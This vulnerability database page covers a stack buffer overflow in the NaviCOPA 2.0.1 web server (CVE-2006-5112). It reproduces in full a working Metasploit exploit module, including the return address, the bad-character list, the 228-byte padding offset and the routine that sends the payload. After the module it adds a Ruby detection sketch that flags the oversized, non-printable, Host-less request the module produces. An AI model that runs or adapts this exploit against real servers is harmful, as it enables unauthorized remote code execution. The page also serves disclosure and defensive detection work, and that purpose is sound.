NaviCOPA 2.0.1 URL Handling Buffer Overflow

12 Nov 2006 15:06:55 | Reported by MC <[email protected]> | Type: metasploit | Source: www.rapid7.com

NaviCOPA 2.0.1 URL Handling Buffer Overflow: a stack buffer overflow caused by a boundary error in the handling of URL parameters.


Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Cvelist | CVE-2006-5112 | 2 Oct 2006 20:00 | cvelist |
| Cvelist | CVE-2007-1733 | 28 Mar 2007 22:00 | cvelist |
| Cvelist | CVE-2007-2336 | 27 Apr 2007 16:00 | cvelist |
| securityvulns | NaviCOPA Web Server buffer overflow | 28 Sep 2006 00:00 | securityvulns |
| CVE | CVE-2006-5112 | 3 Oct 2006 04:03 | cve |
| CVE | CVE-2007-1733 | 28 Mar 2007 22:19 | cve |
| CVE | CVE-2007-2336 | 27 Apr 2007 16:19 | cve |
| Packet Storm | NaviCOPA 2.0.1 URL Handling Buffer Overflow | 26 Nov 2009 00:00 | packetstorm |
| CERT | NaviCOPA Web Server fails to properly handle certain HTTP requests | 21 Nov 2006 00:00 | cert |
| NVD | CVE-2006-5112 | 3 Oct 2006 04:03 | nvd |

Code

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /InterVations/ ] }

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NaviCOPA 2.0.1 URL Handling Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in NaviCOPA 2.0.1.
        The vulnerability is caused due to a boundary error within the
        handling of URL parameters.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-5112' ],
          [ 'OSVDB', '29257' ],
          [ 'BID', '20250' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 400,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['NaviCOPA 2.0.1 Universal', { 'Ret' => 0x1009b4ff }], # IV320009.dll
        ],
      'DisclosureDate' => '2006-09-28',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(80)
      ])
  end

  def check
    connect

    sock.put("GET / HTTP/1.0\r\n\r\n")
    resp = sock.get_once
    disconnect

    if (resp =~ /2\.01 11th September/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    sploit =  rand_text_alphanumeric(228, payload_badchars)
    sploit << [target.ret].pack('V') + payload.encoded

    uri = '/' + sploit

    res = "GET #{uri} HTTP/1.1\r\n\r\n"

    print_status("Trying target %s" % target.name)

    sock.put(res)
    sock.close

    handler
    disconnect
  end
end
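
Added detection example (not part of the Metasploit module or of the original page): a Ruby check that flags the request shape the module above produces, namely a URL path longer than its 228-byte filler, raw non-printable bytes in the URI, and an HTTP/1.1 request line sent without a Host header. The names `inspect_request` and `PAD_BEFORE_RET` and both sample requests are constructed for this illustration; treating 228 bytes after the leading "/" as the alert threshold is an assumption drawn from the module's filler length.

```ruby
# Added detection sketch; not code from the Metasploit module above.
# Assumption: the module writes 228 filler bytes before the return address,
# so any path longer than that (after the leading "/") reaches past the buffer.
PAD_BEFORE_RET = 228

# Constructed sample inputs (no real payload bytes, only filler).
BENIGN    = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
OVERSIZED = 'GET /' + ('A' * 228) + "\xFF\xFE\xFD\xFC".b + ('B' * 64) +
            " HTTP/1.1\r\n\r\n"

# Inspect one raw HTTP request and return an array of findings (empty = clean).
def inspect_request(raw)
  head  = raw.b.split("\r\n\r\n", 2).first.to_s   # headers only, as raw bytes
  lines = head.split("\r\n")
  _verb, uri, version = lines.shift.to_s.split(/ /, 3)
  return ['malformed request line'] if uri.nil? || version.nil?

  findings = []
  path_len = uri.split('?', 2).first.to_s.bytesize - 1  # exclude leading "/"
  if path_len > PAD_BEFORE_RET
    findings << "URL path of #{path_len} bytes exceeds #{PAD_BEFORE_RET}-byte pad"
  end
  # A correctly encoded URI contains only printable ASCII; a packed address
  # or encoded payload usually does not.
  findings << 'raw non-printable bytes in URI' if uri =~ /[^\x21-\x7e]/n
  # The module sends "GET <uri> HTTP/1.1" with no headers at all, while a
  # conforming HTTP/1.1 client always sends Host.
  has_host = lines.any? { |l| l =~ /\AHost:/i }
  if version == 'HTTP/1.1' && !has_host
    findings << 'HTTP/1.1 request without Host header'
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  { 'benign' => BENIGN, 'oversized' => OVERSIZED }.each do |name, req|
    hits = inspect_request(req)
    puts "#{name}: #{hits.empty? ? 'clean' : hits.join('; ')}"
  end
end
```

Legitimate URLs on other servers routinely exceed 228 bytes, so the length rule is only meaningful in front of a NaviCOPA 2.0.1 host; the other two findings are independent of that threshold.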

12 Nov 2006 15:55 (Current) | Vulners AI Score: 7.4 (High risk) | CVSS2: 7.5 | EPSS: 0.75781